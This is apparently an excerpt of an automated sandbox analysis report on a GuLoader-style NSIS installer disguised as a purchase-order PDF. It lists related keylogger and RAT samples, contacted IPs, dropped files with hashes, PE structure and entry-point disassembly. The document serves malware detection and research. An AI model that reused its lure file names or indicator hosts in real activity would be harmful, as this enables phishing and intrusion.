                                                                                      Justificante pago-09453256434687.exeGet hashmaliciousGuLoader, Snake Keylogger, VIP KeyloggerBrowse
                                                                                      • 158.101.44.242
                                                                                      pedido-035241.exeGet hashmaliciousGuLoader, Snake Keylogger, VIP KeyloggerBrowse
                                                                                      • 158.101.44.242
                                                                                      QUOTATION REQUEST - BQS058.exeGet hashmaliciousMassLogger RATBrowse
                                                                                      • 193.122.6.168
                                                                                      FT876567090.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                      • 158.101.44.242
                                                                                      REQUEST FOR QUOTATION 1307-RFQ.exeGet hashmaliciousMassLogger RATBrowse
                                                                                      • 158.101.44.242
                                                                                      ref_97024130865.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                                                                      • 193.122.130.0
                                                                                      TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                      • 193.122.130.0
                                                                                      PURCHASE ORDER 006-2024 GIA-AV Rev 1_pdf.exeGet hashmaliciousGuLoaderBrowse
                                                                                      • 158.101.44.242
                                                                                      SWIFT091816-24_pdf.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                      • 193.122.6.168
                                                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                      54328bd36c14bd82ddaa0c04b25ed9adJustificante pago-09453256434687.exeGet hashmaliciousGuLoader, Snake Keylogger, VIP KeyloggerBrowse
                                                                                      • 188.114.97.3
                                                                                      pedido-035241.exeGet hashmaliciousGuLoader, Snake Keylogger, VIP KeyloggerBrowse
                                                                                      • 188.114.97.3
                                                                                      QUOTATION REQUEST - BQS058.exeGet hashmaliciousMassLogger RATBrowse
                                                                                      • 188.114.97.3
                                                                                      FT876567090.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                      • 188.114.97.3
                                                                                      REQUEST FOR QUOTATION 1307-RFQ.exeGet hashmaliciousMassLogger RATBrowse
                                                                                      • 188.114.97.3
                                                                                      PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exeGet hashmaliciousVIP KeyloggerBrowse
                                                                                      • 188.114.97.3
                                                                                      ref_97024130865.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                                                                      • 188.114.97.3
                                                                                      CITAS_pif.exeGet hashmaliciousMassLogger RATBrowse
                                                                                      • 188.114.97.3
                                                                                      TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                      • 188.114.97.3
                                                                                      PURCHASE ORDER 006-2024 GIA-AV Rev 1_pdf.exeGet hashmaliciousGuLoaderBrowse
                                                                                      • 188.114.97.3
                                                                                      3b5074b1b5d032e5620f69f9f700ff0edrivers.exeGet hashmaliciousUnknownBrowse
                                                                                      • 149.154.167.220
                                                                                      GameBoxMini.exeGet hashmaliciousUnknownBrowse
                                                                                      • 149.154.167.220
                                                                                      drivers.exeGet hashmaliciousUnknownBrowse
                                                                                      • 149.154.167.220
                                                                                      Justificante pago-09453256434687.exeGet hashmaliciousGuLoader, Snake Keylogger, VIP KeyloggerBrowse
                                                                                      • 149.154.167.220
                                                                                      https://docsend.com/v/ty7vw/up-dateGet hashmaliciousUnknownBrowse
                                                                                      • 149.154.167.220
                                                                                      3gJQoqWpxb.batGet hashmaliciousUnknownBrowse
                                                                                      • 149.154.167.220
                                                                                      uZgbejeJkT.batGet hashmaliciousUnknownBrowse
                                                                                      • 149.154.167.220
                                                                                      ni2OwV1y9u.batGet hashmaliciousUnknownBrowse
                                                                                      • 149.154.167.220
                                                                                      l9IH82eiKw.exeGet hashmaliciousUnknownBrowse
                                                                                      • 149.154.167.220
                                                                                      3gJQoqWpxb.batGet hashmaliciousUnknownBrowse
                                                                                      • 149.154.167.220
                                                                                      37f463bf4616ecd445d4a1937da06e19file.exeGet hashmaliciousScreenConnect Tool, Amadey, RHADAMANTHYS, XWorm, XmrigBrowse
                                                                                      • 142.250.185.193
                                                                                      • 142.250.186.174
                                                                                      Justificante pago-09453256434687.exeGet hashmaliciousGuLoader, Snake Keylogger, VIP KeyloggerBrowse
                                                                                      • 142.250.185.193
                                                                                      • 142.250.186.174
                                                                                      ME-SPC-94.03.60.175.07.exeGet hashmaliciousGuLoaderBrowse
                                                                                      • 142.250.185.193
                                                                                      • 142.250.186.174
                                                                                      09-FD-94.03.60.175.07.xlsx.exeGet hashmaliciousGuLoaderBrowse
                                                                                      • 142.250.185.193
                                                                                      • 142.250.186.174
                                                                                      TEC-SPC-94.03.60.175.07.exeGet hashmaliciousGuLoaderBrowse
                                                                                      • 142.250.185.193
                                                                                      • 142.250.186.174
                                                                                      ME-SPC-94.03.60.175.07.exeGet hashmaliciousGuLoaderBrowse
                                                                                      • 142.250.185.193
                                                                                      • 142.250.186.174
                                                                                      09-FD-94.03.60.175.07.xlsx.exeGet hashmaliciousGuLoaderBrowse
                                                                                      • 142.250.185.193
                                                                                      • 142.250.186.174
                                                                                      TEC-SPC-94.03.60.175.07.exeGet hashmaliciousGuLoaderBrowse
                                                                                      • 142.250.185.193
                                                                                      • 142.250.186.174
                                                                                      pedido-035241.exeGet hashmaliciousGuLoader, Snake Keylogger, VIP KeyloggerBrowse
                                                                                      • 142.250.185.193
                                                                                      • 142.250.186.174
                                                                                      dZKPE9gotO.exeGet hashmaliciousVidarBrowse
                                                                                      • 142.250.185.193
                                                                                      • 142.250.186.174
                                                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                      C:\Users\user\AppData\Local\Temp\nsiEA09.tmp\System.dllSWIFT091816-24_pdf.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                        REQUEST FOR QUOATION AND PRICES 0910775_pdf.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                          SWIFT09181-24_pdf.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                            O0rhQM49FL.exeGet hashmaliciousUnknownBrowse
                                                                                              O0rhQM49FL.exeGet hashmaliciousGuLoaderBrowse
                                                                                                5WP9WCM8qV.exeGet hashmaliciousGuLoaderBrowse
                                                                                                  5WP9WCM8qV.exeGet hashmaliciousGuLoaderBrowse
                                                                                                    K8ZvbdkrGx.exeGet hashmaliciousGuLoaderBrowse
                                                                                                      K8ZvbdkrGx.exeGet hashmaliciousGuLoaderBrowse
                                                                                                        JOSXXL1.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                          Process:C:\Users\user\Desktop\PURCHASE ORDER TRC-0909718-24_pdf.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):363811
                                                                                                          Entropy (8bit):1.2512349423386382
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:768:y2f405GRYtnSLOBbyCociR2TVuEpHsVURGxwGmXjyMB+CtKDOgt9rlHF1QOs+9m5:pIuagbnK7CwVwFpYogwhUsvCq
                                                                                                          MD5:BFEA15C03AB295424981A73637A19491
                                                                                                          SHA1:A5ADABDDC373D6B3004F96946D84B651E42D9F5C
                                                                                                          SHA-256:83E9CE74259889DCABD39D41131F286882B224698DCDEB8D0B4074069AAA687B
                                                                                                          SHA-512:CB5969BFFAED8AF1791938E924E0CC9F876E45165F4E7EA5E9249131FACA831C0600F14BD68EF041D18C81A3FBE087970043D1B3B8A6786C1E5E5049834D4D0D
                                                                                                          Malicious:false
                                                                                                          Reputation:low
                                                                                                          Preview:...................................................E....................................j.A..(.......................................+..........................$.............................................z.L........%......t...................................2l.............1.............................................................................U...g.......................`............................................................0..................................J......................................K...R...............................................................&...c......................................S......!...8..................Y......................................................>u........T...................L........................................................................0.........................................W.....L.n.....................................$.b...........B..................................................8...............!...............
                                                                                                          Process:C:\Users\user\Desktop\PURCHASE ORDER TRC-0909718-24_pdf.exe
                                                                                                          File Type:ASCII text, with very long lines (345), with no line terminators
                                                                                                          Category:dropped
                                                                                                          Size (bytes):345
                                                                                                          Entropy (8bit):4.241929841155785
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:6:dvkdMOL4xnuXGNQWjMIDw1luhPB46xAJX7sBJOdkmLA8gMfArpIXbgOwQWiQJEEC:dufExIoDe1lYnGJLsBQdtL6rpIrWQkJA
                                                                                                          MD5:AE69FE0F4D1E1115BC470031E661785C
                                                                                                          SHA1:8D3799826FE457C61C1E8EE5E3071683A8125BC5
                                                                                                          SHA-256:6B18768503395C809263568D3A8858810404C2B7D49DC7CB6CE5F717F5D6C7DE
                                                                                                          SHA-512:969C0DB048EAC4A9B447A0C0C463A7983F1B4091B6206E274B9D249F8311439B6C33F5AA1EDF9CD1AA27502DA49378D3E1B45F16909C55DF830E51684E9648BE
                                                                                                          Malicious:false
                                                                                                          Reputation:low
                                                                                                          Preview:pandas omflakkendes tribrachic miskenning.nonvitally subcase syvendelens weighin.tilhreres lysed metencephalons aabentstaaendes arbejdsmarkedsstyrelsers.kodeskrifter indgaaet nstnederst desulphurise badevgtene caliche.reabsorption erhvervskommunernes aktuarerne ammunition whilere sughs.tusindaarigt barkers landholders butylation phrenicocolic.
                                                                                                          Process:C:\Users\user\Desktop\PURCHASE ORDER TRC-0909718-24_pdf.exe
                                                                                                          File Type:Matlab v4 mat-file (little endian) ', numeric, rows 63, columns 0
                                                                                                          Category:dropped
                                                                                                          Size (bytes):210366
                                                                                                          Entropy (8bit):1.240975322465592
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:768:vBTwJOLxCIF0V6iLboHog6BQlsMqlN1R0pmGy30wbfq6+9GmlsNh34k0uJ/QohER:cJigyyDJnLH7zA
                                                                                                          MD5:AEF78D8D561E8802286A78AAC6C73ED6
                                                                                                          SHA1:DDF5DA649482D0A553802827BB9F0EF64A7069E1
                                                                                                          SHA-256:45F24543C01C9A11CC2246A9B27569AF433EEF61C877A4E191B683315D3566BE
                                                                                                          SHA-512:93D43C0CECADF8E1F507F8E58D2B4D92995D8F7ECF213A23559938B380033A6D0D80B0816A8D6603864F821F4FEDC988E0F79BE14C6892089178970E08DC4199
                                                                                                          Malicious:false
                                                                                                          Reputation:low
                                                                                                          Preview:....?...........*=..'...........................m........................y............................................................................H.......................................c.......x........................................................:...s.......................+.........................................~.....2........C..Z...................................k............................i.........................................{...............................................?%............................................................................Z................................v.............<.....'.............L..........................................+...............................s.........................................W........................`........................[..............&..................T................................j......M......[.....................c.............................................9.......................................
                                                                                                          Process:C:\Users\user\Desktop\PURCHASE ORDER TRC-0909718-24_pdf.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):301328
                                                                                                          Entropy (8bit):7.7592745368614455
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:6144:yzRyNCuHDSKdjLFdwAHj8Si2OjiRSLSgWEbExRcSwONrvquzJk8axhiLiV:Wy9HDDdESiljs8RoxNwOJRzJk8a2L6
                                                                                                          MD5:0076E7A472C5E8B779E86291C0297C32
                                                                                                          SHA1:20F39E6159F72DEF9727898C72F7297165A8FC5D
                                                                                                          SHA-256:2DBBC59173FBC061C8A43C5781B63EF9ECFDE64EC53AA7276E732C37791944DF
                                                                                                          SHA-512:7A48E44053C16A9A2852A7BED1BEA50A9672DCD736EA9CEDBB270389D9DEE2120E851BB8D66B81BE7E773BC58FB00A14D3C3D8FC5DEEAC65E2E21ACBF8844545
                                                                                                          Malicious:false
                                                                                                          Reputation:low
                                                                                                          Preview:....=........****...z......................i.........S.XXX...........gg..........kkkkkk.......~~~~....................... ...''..............9........NNNN....................d..OOO.!..............%.... ............?.....66....................................9...>>>..............................................).}.......................vv.......L....hhh..................w.....kkkkk...........s..................................^.............DD........).......4.....................hh..........d.......%...........YYYY.......P.....O......M..W..%...o....====...........Q........11.........11.......""".........^^^^^^............k........`..c.vvvvvvvvvv...........xxx.....s..................DD...R.........88.........:.....!!..mm..xx................:....//....8.`.HH.....................{{.Z......#.........88..........I.#......"....n....7...aa....................****....>>...................UU....................-....................5.......J.vv..ww...JJJJJJ..___....2....//.........b.FF.111....QQ
                                                                                                          Process:C:\Users\user\Desktop\PURCHASE ORDER TRC-0909718-24_pdf.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):56641
                                                                                                          Entropy (8bit):1.2318917163845036
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:384:vrBeaW6xu5Pd9GW0Zq+/HXF1qcGNMUd8phxiFQHOV7hpvZlq:t9+Pdop/306xixrlq
                                                                                                          MD5:39C9A5F767D8C170B5CE38EA8D5734D4
                                                                                                          SHA1:4B4CA81EB3D093645B504004F62A269D4EACDECC
                                                                                                          SHA-256:87A7017021050071DBE5726BF9AC505763CD923E2BDE93336CA0905802CD8D49
                                                                                                          SHA-512:AE2D66B801251046FA4D3093391B916955B43BE75A954DD398583B1B8881A9F109F51F81D6E4FE759F83AC7B921FA89B02185013AFDE16D3C8EAB422BE89B4FF
                                                                                                          Malicious:false
                                                                                                          Reputation:low
                                                                                                          Preview:.............l.........z........i........8.........................m.........f.C.Z..............I./........T..1.......................!......................D.................................................................................U................................../........................................-.......................}.........T`.....0@.............................F..............................].........................L.........<.........................................................................................N......................................................x........................................................@............................................4..........'...................?..........I.............../....................L....,...............................................;......k.....................................i............4.......................................K.....7...7....c...................U..#..............................
                                                                                                          Process:C:\Users\user\Desktop\PURCHASE ORDER TRC-0909718-24_pdf.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):114032
                                                                                                          Entropy (8bit):4.628231683472205
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:1536:ZjIgUXSEWfrdXfassi3GU/y/G8MfgJXZ4mh0DG2TJk6OW:ZEgS6rWK8rbYL/
                                                                                                          MD5:43653F2E823BAB8F017387619AA400F9
                                                                                                          SHA1:1ACF64525250DA5928F26E4219EAEFACC006E483
                                                                                                          SHA-256:BD50AEBCD64EB5AB248BB5C34C75B8E56D3193E07A33469A99ABBE2901AF4AE2
                                                                                                          SHA-512:8AA30DA2743F67BD419EA0524E4E6D145CA96401957FD5692C901B54C69B041DCDF79B3F0CEE06A8DCB564E608428842EC32513E3FE551F89F356412F8CD055D
                                                                                                          Malicious:false
                                                                                                          Preview:..........................hhhh.....NNNNNNNN...]]..............ll........._...............................}}.%....L......................H.s........==.......;.``.............ddddd......-..."...............ii.......>.S.....*..............h......................KKK..........4.............U......G...0000000....KKK....................6........%%.qqq................................n..EEE..%..SSSSS..........S.444............kk............;;;;........aa........ee....ii.......L.......O..SSS.TT..}}...........................OOOO.................&............,..........$$.`..;;;.CCC.HH.d.............e...gg..................."""............H...............1.G.MMMM....+........................b."........__..................................F................yyyy.........................x.fff...................\\...m...7.....\...&.............u............-.......``.....`........................222......3.3.n..D....................++++.....AA.w........\\...TT..........}}.....................LL......nn
                                                                                                          Process:C:\Users\user\Desktop\PURCHASE ORDER TRC-0909718-24_pdf.exe
                                                                                                          File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                          Category:dropped
                                                                                                          Size (bytes):11776
                                                                                                          Entropy (8bit):5.655335921632966
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:192:eF24sihno00Wfl97nH6T2enXwWobpWBTU4VtHT7dmN35Ol9Sl:h8QIl975eXqlWBrz7YLOl9
                                                                                                          MD5:EE260C45E97B62A5E42F17460D406068
                                                                                                          SHA1:DF35F6300A03C4D3D3BD69752574426296B78695
                                                                                                          SHA-256:E94A1F7BCD7E0D532B660D0AF468EB3321536C3EFDCA265E61F9EC174B1AEF27
                                                                                                          SHA-512:A98F350D17C9057F33E5847462A87D59CBF2AAEDA7F6299B0D49BB455E484CE4660C12D2EB8C4A0D21DF523E729222BBD6C820BF25B081BC7478152515B414B3
                                                                                                          Malicious:false
                                                                                                          Antivirus:
                                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                                          • Antivirus: Virustotal, Detection: 0%, Browse
                                                                                                          Joe Sandbox View:
                                                                                                          • Filename: SWIFT091816-24_pdf.exe, Detection: malicious, Browse
                                                                                                          • Filename: REQUEST FOR QUOATION AND PRICES 0910775_pdf.exe, Detection: malicious, Browse
                                                                                                          • Filename: SWIFT09181-24_pdf.exe, Detection: malicious, Browse
                                                                                                          • Filename: O0rhQM49FL.exe, Detection: malicious, Browse
                                                                                                          • Filename: O0rhQM49FL.exe, Detection: malicious, Browse
                                                                                                          • Filename: 5WP9WCM8qV.exe, Detection: malicious, Browse
                                                                                                          • Filename: 5WP9WCM8qV.exe, Detection: malicious, Browse
                                                                                                          • Filename: K8ZvbdkrGx.exe, Detection: malicious, Browse
                                                                                                          • Filename: K8ZvbdkrGx.exe, Detection: malicious, Browse
                                                                                                          • Filename: JOSXXL1.exe, Detection: malicious, Browse
                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......1...u.u.u...s.u.a....r.!..q....t....t.Richu.........................PE..L...]..V...........!..... ...........'.......0...............................`.......................................2.......0..P............................P.......................................................0..X............................text............ .................. ..`.rdata..S....0.......$..............@..@.data...x....@.......(..............@....reloc..b....P.......*..............@..B................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                          Process:C:\Users\user\Desktop\PURCHASE ORDER TRC-0909718-24_pdf.exe
                                                                                                          File Type:MS Windows shortcut, Item id list present, Has Relative path, Has Working directory, ctime=Sun Dec 31 23:25:52 1600, mtime=Sun Dec 31 23:25:52 1600, atime=Sun Dec 31 23:25:52 1600, length=0, window=hide
                                                                                                          Category:dropped
                                                                                                          Size (bytes):1176
                                                                                                          Entropy (8bit):3.26766291921788
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:12:8wl0asXowAOcQ/tz0/CSL6/cBnwgXl341DEDeG41DEDW2RKQ1olfW+kjcmAaUGGI:8xLDWLrFPjPK29izZMUEpdqy
                                                                                                          MD5:F18346D4B0043E2093BA7D295B5A8105
                                                                                                          SHA1:CAF68803CEB0A092EABB50C87F2BB650AFC9EEDA
                                                                                                          SHA-256:0F43F66F718B93A28C4191F812067F1B323DE88C71DC427FE905827ADDCC7AE1
                                                                                                          SHA-512:9A0092150DF5156B3712441B7501F59056CC38553B6842B29EA4B1D79A53A86A0CCB89D723F57007791049AB5955DC29054804887B3B8B84E6DA076EB3106CC5
                                                                                                          Malicious:false
                                                                                                          Preview:L..................F........................................................m....P.O. .:i.....+00.../C:\...................P.1...........Users.<............................................U.s.e.r.s.....P.1...........user.<............................................j.o.n.e.s.....V.1...........AppData.@............................................A.p.p.D.a.t.a.....V.1...........Roaming.@............................................R.o.a.m.i.n.g.....b.1...........mindevrdigt.H............................................m.i.n.d.e.v.r.d.i.g.t.......2...........boghandlermedhjlperens.tor..f............................................b.o.g.h.a.n.d.l.e.r.m.e.d.h.j.l.p.e.r.e.n.s...t.o.r...*.../.....\.....\.....\.m.i.n.d.e.v.r.d.i.g.t.\.b.o.g.h.a.n.d.l.e.r.m.e.d.h.j.l.p.e.r.e.n.s...t.o.r.Y.C.:.\.U.s.e.r.s.\.j.o.n.e.s.\.A.p.p.D.a.t.a.\.L.o.c.a.l.\.M.i.c.r.o.s.o.f.t.\.W.i.n.d.o.w.s.\.I.N.e.t.C.a.c.h.e.\.r.a.p.i.d.i.t.e.t.e.n.s.\.f.r.e.m.t.v.i.n.g.\.F.a.s.c.i.c.u.l.i.............y............
                                                                                                          File type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                                                                                                          Entropy (8bit):7.964736299838112
                                                                                                          TrID:
                                                                                                          • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                                                          • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                                          • DOS Executable Generic (2002/1) 0.02%
                                                                                                          • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                          File name:PURCHASE ORDER TRC-0909718-24_pdf.exe
                                                                                                          File size:491'585 bytes
                                                                                                          MD5:95611e69a35eafc00725b14abcc7cc1a
                                                                                                          SHA1:ce2e851da7726a726c4232463cf2ddd2e96ab27d
                                                                                                          SHA256:e6a47a3ccdb6e669409024f10c2d1ebddb97d93b8c8eda17055ba377207f62a0
                                                                                                          SHA512:e611d019cc3a17b3147cc3dd1db00d99c1144aaf34da7377d08a857c5ac756647f888c1e19eec79ab1ef4da0fbb9516a93cda259d3312e267452274839bdb71f
                                                                                                          SSDEEP:12288:I5A4EITYTsh417z6mmCke3aSiEshadOu7Jj1JK8s5FEeK/:Z4fTbSvxkBS/6adOu7Jj1Jicea
                                                                                                          TLSH:49A4230122719273D97707320D267EEAFA7EF91A47604F0283641E8C39717F5ED2E9A9
                                                                                                          File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1...P...P...P..*_...P...P..NP..*_...P...s...P...V...P..Rich.P..........................PE..L......V.................d.........
                                                                                                          Icon Hash:3d2e0f95332b3399
                                                                                                          Entrypoint:0x4032a0
                                                                                                          Entrypoint Section:.text
                                                                                                          Digitally signed:false
                                                                                                          Imagebase:0x400000
                                                                                                          Subsystem:windows gui
                                                                                                          Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                                                                                                          DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                                                                          Time Stamp:0x567F847F [Sun Dec 27 06:26:07 2015 UTC]
                                                                                                          TLS Callbacks:
                                                                                                          CLR (.Net) Version:
                                                                                                          OS Version Major:4
                                                                                                          OS Version Minor:0
                                                                                                          File Version Major:4
                                                                                                          File Version Minor:0
                                                                                                          Subsystem Version Major:4
                                                                                                          Subsystem Version Minor:0
                                                                                                          Import Hash:d4b94e8ee3f620a89d114b9da4b31873
                                                                                                          Instruction
                                                                                                          sub esp, 000002D4h
                                                                                                          push ebp
                                                                                                          push esi
                                                                                                          push 00000020h
                                                                                                          xor ebp, ebp
                                                                                                          pop esi
                                                                                                          mov dword ptr [esp+0Ch], ebp
                                                                                                          push 00008001h
                                                                                                          mov dword ptr [esp+0Ch], 0040A300h
                                                                                                          mov dword ptr [esp+18h], ebp
                                                                                                          call dword ptr [004080B0h]
                                                                                                          call dword ptr [004080ACh]
                                                                                                          cmp ax, 00000006h
                                                                                                          je 00007FDAB0853083h
                                                                                                          push ebp
                                                                                                          call 00007FDAB08561C6h
                                                                                                          cmp eax, ebp
                                                                                                          je 00007FDAB0853079h
                                                                                                          push 00000C00h
                                                                                                          call eax
                                                                                                          push ebx
                                                                                                          push edi
                                                                                                          push 0040A2F4h
                                                                                                          call 00007FDAB0856143h
                                                                                                          push 0040A2ECh
                                                                                                          call 00007FDAB0856139h
                                                                                                          push 0040A2E0h
                                                                                                          call 00007FDAB085612Fh
                                                                                                          push 00000009h
                                                                                                          call 00007FDAB0856194h
                                                                                                          push 00000007h
                                                                                                          call 00007FDAB085618Dh
                                                                                                          mov dword ptr [00434F04h], eax
                                                                                                          call dword ptr [00408044h]
                                                                                                          push ebp
                                                                                                          call dword ptr [004082A8h]
                                                                                                          mov dword ptr [00434FB8h], eax
                                                                                                          push ebp
                                                                                                          lea eax, dword ptr [esp+34h]
                                                                                                          push 000002B4h
                                                                                                          push eax
                                                                                                          push ebp
                                                                                                          push 0042B228h
                                                                                                          call dword ptr [0040818Ch]
                                                                                                          push 0040A2C8h
                                                                                                          push 00433F00h
                                                                                                          call 00007FDAB0855D7Ah
                                                                                                          call dword ptr [004080A8h]
                                                                                                          mov ebx, 0043F000h
                                                                                                          push eax
                                                                                                          push ebx
                                                                                                          call 00007FDAB0855D68h
                                                                                                          push ebp
                                                                                                          call dword ptr [00408178h]
                                                                                                          Programming Language:
                                                                                                          • [EXP] VC++ 6.0 SP5 build 8804
                                                                                                          NameVirtual AddressVirtual Size Is in Section
                                                                                                          IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                          IMAGE_DIRECTORY_ENTRY_IMPORT0x85c80xa0.rdata
                                                                                                          IMAGE_DIRECTORY_ENTRY_RESOURCE0x5d0000x11e0.rsrc
                                                                                                          IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                          IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                                          IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                                                                                          IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                                          IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                          IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                          IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                                          IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                                          IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                          IMAGE_DIRECTORY_ENTRY_IAT0x80000x2b8.rdata
                                                                                                          IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                          IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                                          IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                                                                                          NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                          .text0x10000x637c0x640083ff228d6dae8dd738eb2f78afbc793fFalse0.672421875data6.491609540807675IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                                          .rdata0x80000x147c0x1600d9f9b0b330e238260616b62a7a3cac09False0.42933238636363635data4.973928345594701IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                          .data0xa0000x2aff80x6003f2b05c8fbb8b2e4c9c89e93d30e7252False0.53125data4.133631086111171IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                          .ndata0x350000x280000x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                          .rsrc0x5d0000x11e00x120020639f4e7c421f5379e2fb9ea4a1530dFalse0.3684895833333333data4.485045860065118IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                          NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                                          RT_BITMAP0x5d2680x368Device independent bitmap graphic, 96 x 16 x 4, image size 768EnglishUnited States0.23623853211009174
                                                                                                          RT_ICON0x5d5d00x2e8Device independent bitmap graphic, 32 x 64 x 4, image size 640EnglishUnited States0.42473118279569894
                                                                                                          RT_DIALOG0x5d8b80x144dataEnglishUnited States0.5216049382716049
                                                                                                          RT_DIALOG0x5da000x13cdataEnglishUnited States0.5506329113924051
                                                                                                          RT_DIALOG0x5db400x100dataEnglishUnited States0.5234375
                                                                                                          RT_DIALOG0x5dc400x11cdataEnglishUnited States0.6056338028169014
                                                                                                          RT_DIALOG0x5dd600xc4dataEnglishUnited States0.5918367346938775
                                                                                                          RT_DIALOG0x5de280x60dataEnglishUnited States0.7291666666666666
                                                                                                          RT_GROUP_ICON0x5de880x14dataEnglishUnited States1.2
                                                                                                          RT_MANIFEST0x5dea00x33fXML 1.0 document, ASCII text, with very long lines (831), with no line terminatorsEnglishUnited States0.5547533092659447
                                                                                                          DLLImport
                                                                                                          KERNEL32.dllSetCurrentDirectoryW, GetFileAttributesW, GetFullPathNameW, Sleep, GetTickCount, GetFileSize, GetModuleFileNameW, MoveFileW, SetFileAttributesW, GetCurrentProcess, ExitProcess, SetEnvironmentVariableW, GetWindowsDirectoryW, GetTempPathW, GetCommandLineW, GetVersion, SetErrorMode, lstrlenW, lstrcpynW, CopyFileW, CompareFileTime, GlobalLock, CreateThread, GetLastError, CreateDirectoryW, CreateProcessW, RemoveDirectoryW, lstrcmpiA, CreateFileW, GetTempFileNameW, WriteFile, lstrcpyA, lstrcpyW, MoveFileExW, lstrcatW, GetSystemDirectoryW, LoadLibraryW, GetProcAddress, GetModuleHandleA, ExpandEnvironmentStringsW, GetShortPathNameW, SearchPathW, lstrcmpiW, SetFileTime, CloseHandle, GlobalFree, lstrcmpW, GlobalAlloc, WaitForSingleObject, GlobalUnlock, GetDiskFreeSpaceW, GetExitCodeProcess, FindFirstFileW, FindNextFileW, DeleteFileW, SetFilePointer, ReadFile, FindClose, MulDiv, MultiByteToWideChar, lstrlenA, WideCharToMultiByte, GetPrivateProfileStringW, WritePrivateProfileStringW, FreeLibrary, LoadLibraryExW, GetModuleHandleW
